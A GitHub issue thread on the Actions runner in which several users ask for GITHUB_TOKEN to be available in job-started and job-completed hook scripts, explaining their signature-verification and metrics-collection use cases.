runner icon indicating copy to clipboard operation
runner copied to clipboard
verified publisher icon actions

GITHUB_TOKEN not present in script set as ACTIONS_RUNNER_HOOK_JOB_STARTED

Open mirobertod opened this issue 2 years ago • 6 comments

Describe the bug The env var GITHUB_TOKEN is not present in the context of the script set as ACTIONS_RUNNER_HOOK_JOB_STARTED. Not sure if this has some security concern, but we would need a valid GITHUB_TOKEN during our pre-job script.

To Reproduce Steps to reproduce the behavior:

  1. Create a simple bash script that run the command env and set its path as env var for ACTIONS_RUNNER_HOOK_JOB_STARTED
  2. Trigger the workflow
  3. See there is no GITHUB_TOKEN available.

Expected behavior The env var GITHUB_TOKEN should be present in the context of the script set as ACTIONS_RUNNER_HOOK_JOB_STARTED.

Runner Version and Platform

Version of your runner? 2.308.0

OS of the machine running the runner? Linux Debian 11, Kubernetes (GKE) using actions-runner-controller.

Thanks

mirobertod avatar Aug 30 '23 13:08 mirobertod

We also struggle with same problem...

AmorfEvo avatar Sep 13 '23 12:09 AmorfEvo

Hey guys, any update on this? Thanks

mirobertod avatar Dec 21 '23 16:12 mirobertod

Hello,

Any chance this change might be implemented soon ?

Thanks in advance for your feedback Éric

EricDales avatar Mar 16 '24 08:03 EricDales

Any news about this?

MiticoBerna avatar Jul 19 '24 13:07 MiticoBerna

@mirobertod @AmorfEvo @EricDales @MiticoBerna could you help us understand more about your scenario. Especially interested in scenarios involving organization-level or enterprise-level runners.

ericsciple avatar Sep 05 '24 21:09 ericsciple

Hi @ericsciple, thank you for your interest.

We want to prevent unauthorized modifications of the CI yaml files under .github folder.

Our goal is to download the repository using the token to verify if, for example, a signature we placed at the top of the CI YAML file has been altered by someone else.

If you have a better approach to ensure that the CI configuration can be modified only from authorized people, let us know.

MiticoBerna avatar Sep 09 '24 16:09 MiticoBerna

Hi @ericsciple for our use-case we're looking to use the token to call the /actions/runs/{run_id}/jobs endpoint during a ACTIONS_RUNNER_HOOK_JOB_COMPLETED hook. This would let us collect metrics/traces about the job's execution (duration of individual steps, statistics about failure rates, etc). All of our runners are organization-level, so this would give us a lot of observability data.

In a roundabout way, I'm trying to retrieve this information via api due to the limitations mentioned in https://github.com/orgs/community/discussions/8945

seanlafferty-ibm avatar Oct 15 '24 19:10 seanlafferty-ibm